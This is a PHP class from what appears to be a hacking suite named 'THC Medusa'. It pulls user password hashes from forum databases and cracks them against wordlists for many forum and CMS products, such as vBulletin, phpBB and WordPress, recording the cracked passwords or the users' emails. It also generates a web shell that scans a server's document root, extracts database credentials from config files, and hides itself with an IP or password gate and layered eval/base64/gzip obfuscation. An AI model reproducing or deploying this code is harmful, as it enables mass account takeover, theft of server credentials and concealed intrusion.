..going to create a new app for the hacksuite. We're not going to do anything fancy here, we will make a simple app to get familiar how to write compatible scripts for the suite. We..
THC xConverter is a tool that makes use of (php) functions in order to calculate, fetch, convert and encrypt data
<?php
/*
Contains all functionality for Medusa.
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/
/* THC Medusa Class */
class THC{
var $aWords = "";
var $aProperties = "";
var $aUserHash = "";
/* main */
function THC(){
}
/* safely load wordlist while preventing file injection vulnerabilities */
function LoadWordlist($sWordlist){
$sWordlist = "../../Wordlists/".$this->ExploitFilter($sWordlist,0,1);
if(false===($aFileData = @file($sWordlist))){
return(false);
}
$this->aWords = $aFileData;
return(true);
}
/* safely load properties from a configuration file while preventing file injection vulnerabilities */
function LoadProperties($sProduct){
$sProduct = "../forums/".$this->ExploitFilter($sProduct,0,1);
if(!file_exists($sProduct)){
return(false);
}
include_once($sProduct);
$this->aProperties = $_PROPERTIES;
return(true);
}
/* execute universal load users query and stores them in var $aUserHash */
function LoadUsers(){
$rQuery = @mysql_query($this->aProperties['queryraw']['attack']);
// UNCOMMENT IF YOU WANT TO SAVE THE QUERY IN test.txt
// $this->WriteF("test.txt",$this->aProperties['queryraw']['attack'],"w");
$this->aProperties['total'] = @mysql_num_rows($rQuery);
$this->aUserHash = array();
if($this->aProperties['total']!=0){
while(false!==($aRow = @mysql_fetch_array($rQuery,MYSQL_ASSOC))){
$this->aUserHash[] = $aRow;
}
}
}
/* black hat one user cracking */
function SetUser($aUser){
$this->aUserHash[] = $aUser;
}
/* returns the email address of a user */
function GetEmail($sUser){
$rQuery = @mysql_query(str_replace("/user/",$sUser,$this->aProperties['queryraw']['getemail']));
return(@mysql_result($rQuery,0,'temail'));
}
/* checks whether the encrypted password matches the hash from the database */
function UserLogin($sUser,$sPass,$sHash,$sSalt=""){
$sEncrypt = "";
$sPass = trim($sPass);
switch($this->aProperties['name']){
case"SMF1":
$sEncrypt = @sha1(strtolower($sUser).$sPass);
break;
case"SMF2":
$sEncrypt = @sha1(strtolower($sUser).$sPass);
break;
case"MyBB":
$sEncrypt = @md5(md5($sSalt).md5($sPass));
break;
case"IPB":
$sEncrypt = @md5(md5($sSalt).md5($sPass));
break;
case"vBulletin4":
$sEncrypt = @md5(md5($sPass).$sSalt);
break;
case"vBulletin3":
$sEncrypt = @md5(md5($sPass).$sSalt);
break;
case"vBulletin5":
$sEncrypt = @md5(md5($sPass).$sSalt);
break;
case"FluxBB":
$sEncrypt = @sha1($sPass);
break;
case"phpBB":
return(phpbb_check_hash($sPass,$sHash) ? true : false);
break;
case"Drupal6":
$sEncrypt = @md5($sPass);
break;
case"Drupal7":
return(user_check_password2($sPass,$sHash) ? true : false);
break;
case"Dolphin":
$sEncrypt = sha1(md5($sPass).$sSalt);
break;
case"Joomla3":
return(PassHashing($sPass,$sHash) ? true : false);
break;
case"Joomla2":
return(PassHashing2($sPass,$sHash) ? true : false);
break;
case"Wordpress":
$cWP = new PasswordHash();
return($cWP->CheckPassword($sPass,$sHash) ? true : false);
case"Vanilla":
$cVanilla = new Gdn_PasswordHash2();
return($cVanilla->CheckPassword($sPass,$sHash,"vanilla") ? true : false);
break;
case"AEF":
$sEncrypt = md5($sSalt.$sPass);
break;
case"MiniBB":
$sEncrypt = md5($sPass);
break;
case"Phorum":
$sEncrypt = md5($sPass);
break;
case"UseBB":
$sEncrypt = md5($sPass);
break;
case"phpFusion":
$sEncrypt = hash_hmac("sha256",$sPass,$sSalt);
break;
case"AVS":
$sEncrypt = md5($sPass);
break;
case"XMB":
$sEncrypt = md5($sPass);
break;
}
return($sEncrypt==$sHash ? true : false);
}
/* creates serialized data so you can keep track of the session's progress */
function CrackUsers($iType){
$iUsers = count($this->aUserHash);
if($iUsers!=0){
// if there are users to crack
$aData = array();
$aData['tstart'] = time();
$aData['total'] = $iUsers;
$aData['product'] = $this->aProperties['name'];
$aData['version'] = $this->aProperties['version'];
$aData['matches'] = 0;
$aData['start'] = date('d-m H:i',$aData['tstart']);
$aData['current'] = 0;
$aData['last_user'] = "";
$aData['users'] = array();
// create session identifier and filename to store the results into
$sFileSession = substr(sha1(time().mt_rand(0,10000)),0,10);
$sResultsFile = "results/".$sFileSession.".txt";
$aData['identifier'] = $sFileSession;
// create results file
$this->WriteF($sResultsFile,serialize($aData),"w");
// insert record into task file
$this->WriteF("tasks.php",$sFileSession."|".$aData['tstart']."|0\n","a");
for($x=0;$x<$iUsers;$x++){
$aData['current']++;
if(is_int($aData['current']/10)){
$this->WriteF($sResultsFile,serialize($aData),"w");
}
for($y=0;$y<count($this->aWords);$y++){
if(@$this->UserLogin($this->aUserHash[$x]['crackuser'],trim($this->aWords[$y]),$this->aUserHash[$x]['crackpass'],(isset($this->aUserHash[$x]['crackhash']) ? $this->aUserHash[$x]['crackhash'] : ""))==true){
// easy user password, store the email and username
$aData['matches']++;
$aData['last_user'] = $this->aUserHash[$x]['crackuser'];
if($iType==0){
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->GetEmail($aData['last_user']));
}
else{
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->aWords[$y]);
}
$this->WriteF($sResultsFile,serialize($aData),"w");
continue;
}
}
}
// finalize record in task file
$this->WriteF("tasks.php",str_replace($sFileSession."|".$aData['tstart']."|0",$sFileSession."|".$aData['tstart']."|1",file_get_contents("tasks.php")),"w");
// finalize record in data file
$this->WriteF($sResultsFile,serialize($aData),"w");
}
}
/* gets the result file for the scan and returns it as a json structure */
function CreateJSON($aData){
$aRecords = array();
for($x=0;$x<count($aData);$x++){
// every iteration is a (running) task
$sData = @file_get_contents("results/".$aData[$x][0].".txt");
if($sData!=false){
$aRecords[] = @unserialize($sData);
}
}
return(json_encode($aRecords));
}
/* fetches all filenames from a directory */
function GetFilesByDirectory($sDir){
if(!$rHandle = @opendir($sDir)){
return(false);
}
$aFileBuffer = array();
while(false!==($sFile = @readdir($rHandle))){
// buffer all files
if($sFile!="." && $sFile!=".."){
if(!is_dir($sDir."/".$sFile)){
$aFileBuffer[] .= $sFile;
}
}
}
@closedir($rHandle);
return $aFileBuffer;
}
/* fetches all php files from a directory and it's sub directories */
function GetPHPFiles($sDir){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
$aData = array();
foreach($iterator as $path){
if(!$path->isDir()){
$aData[] = ($path->__toString());
}
}
return($aData);
}
/* fetches all files that can be created for shell management */
function GetSystemFiles($sDir){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
$aData = array();
foreach($iterator as $path){
unset($_SYSTEM);
if(!$path->isDir()){
$sPath = $path->__toString();
include_once($sPath);
if(isset($_SYSTEM)){
$aData[] = $sPath;
}
}
}
return($aData);
}
/* opens a (task) file and split every line into pieces */
function RawToArray($sFile,$sSeparate="|"){
if(!$aFileData = @file($sFile)){
return(false);
}
$aDataBuffer = array();
for($x=0;$x<count($aFileData);$x++){
if(!$aDataBuffer[$x] = @explode($sSeparate,$aFileData[$x])){
if($aFileData[$x]==""){
continue;
}
}
}
return($aDataBuffer);
}
/* used for preventing LFI exploits in file requests */
function ExploitFilter($sString,$bXSS=false,$bFI=false,$bSQL=false){
if($bXSS==false && $bFI==false && $bSQL==false){
return($sString);
}
if(!is_string($sString)){
return($sString);
}
if($bXSS){
$sString = strip_tags($sString);
}
if($bFI){
$sString = str_replace("../","",$sString);
$sString = str_replace("./","",$sString);
$sString = preg_replace('[^a-zA-Z0-9\-_\.\/ ]','',$sString);
}
if($bSQL){
$sString = mysql_real_escape_string($sString);
}
return($sString);
}
/* writes data to a file, overwrites it or creates a new file with the content in $sWrite */
function WriteF($sDest,$sWrite,$sMode="a"){
if($sMode!="a" && $sMode!="w"){
$sMode = "a";
}
if(!$rNew = @fopen($sDest,$sMode)){
return(false);
}
@fputs($rNew,$sWrite);
@fclose($rNew);
return(true);
}
/* creates the database connection and selects the specified database */
function MySQLConnect($aCredentials){
$rConnect = @mysql_connect($aCredentials['host'],$aCredentials['username'],$aCredentials['password']);
@mysql_select_db($aCredentials['database']);
}
/* creates a medusa shell */
function MedusaShell($aSystem,$aOptions){
$sShell = "set_time_limit(0);\n";
$sTemplate = "";
if(isset($aOptions['ip'])){
// ip protection
$sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";
$sShell .= " header(\"Location: http://www.google.com\");\n";
$sShell .= " exit;\n";
$sShell .= "}\n";
}
if(isset($aOptions['pass'])){
// password protection
$sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";
$sShell .= " echo'<html>\n";
$sShell .= " <head></head>\n";
$sShell .= " <body>\n";
$sShell .= " <form method=\"post\">\n";
$sShell .= " <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";
$sShell .= " </form>\n";
$sShell .= " </body>\n";
$sShell .= " </html>';\n";
$sShell .= " exit;\n";
$sShell .= "}\n";
}
// create shell based on system array
$sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";
$sShell .= "foreach(\$iterator as \$path){\n";
$sShell .= " if(!\$path->isDir()){\n";
$sShell .= " \$sPath = \$path->__toString();\n";
$sShell .= " \$sFile = \"".$aSystem['file']."\";\n";
$sShell .= " if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";
$sShell .= " \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";
$sShell .= " }\n";
$sShell .= " if(strpos(\$sPath,\$sFile)!==false){\n";
$sShell .= " \$sData = file_get_contents(\$sPath);\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";
$sShell .= " if(!isset(\$aUser[1])){\n";
$sShell .= " continue;\n";
$sShell .= " }\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";
$sShell .= " \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";
$sShell .= " \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";
$sShell .= " \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";
$sShell .= " \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";
$sShell .= " die(\$sResult);\n";
$sShell .= " }\n";
$sShell .= " }\n";
$sShell .= "}\n";
$sShell .= "die(\"Failed to get login information.\");\n";
if(isset($aOptions['encrypt'])){
// source protection
if($aOptions['encrypt']=="normal"){
$sShell = "eval(base64_decode('".base64_encode($sShell)."'));\n";
}
else{
$sEncoder = "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";
$sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";
$sEncoder .= "\$aF = array();\n";
$sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval
$sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev
$sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate
$sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate
$sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode
$sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode
$sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress
$sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress
// encode and decode functions
$_ENCODE = array();
$_ENCODE[0] = array(7,"gzcompress");
$_ENCODE[1] = array(4,"base64_encode");
$_DECODE = array();
$_DECODE[0] = array(6,"gzuncompress");
$_DECODE[1] = array(5,"base64_decode");
// good luck decrypting the shell :p
$iEncryptions = count($_ENCODE)-1;
$iEncryptionLoops = mt_rand(120,150);
for($x=0;$x<$iEncryptionLoops;$x++){
$iEncryption = mt_rand(0,$iEncryptions);
$sShell = "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";
}
$sShell = $sEncoder.$sShell.";";
}
}
if(isset($aOptions['shellcreate'])){
// save source
return($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));
}
else{
$sShell = str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");
return($sShell);
}
}
}
?>